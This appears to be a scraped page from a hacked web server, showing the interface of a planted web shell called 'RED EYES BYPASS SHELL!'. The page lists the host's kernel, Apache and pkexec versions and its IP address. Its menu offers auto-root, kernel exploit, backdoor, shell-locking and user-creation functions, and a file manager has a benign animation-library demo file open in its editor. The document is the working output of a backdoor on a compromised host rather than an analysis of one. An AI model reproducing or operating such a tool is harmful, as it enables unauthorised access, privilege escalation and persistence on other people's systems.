Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
aos /
demo /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
async.html
979
B
-rwxr-xr-x
simple.html
5.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : async.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>AOS - Animate on scroll library</title> <meta name="viewport" content="width=device-width"> <link rel="stylesheet" href="css/styles.css" /> <link rel="stylesheet" href="../dist/aos.css" /> </head> <body> <div id="aos-demo" class="aos-all"></div> <script src="../dist/aos.js"></script> <script> AOS.init({ easing: 'ease-in-out-sine' }); setInterval(addItem, 300); var itemsCounter = 1; var container = document.getElementById('aos-demo'); function addItem () { if (itemsCounter > 42) return; var item = document.createElement('div'); item.classList.add('aos-item'); item.setAttribute('data-aos', 'fade-up'); item.innerHTML = '<div class="aos-item__inner"><h3>' + itemsCounter + '</h3></div>'; container.appendChild(item); itemsCounter++; } </script> </body> </html>
Close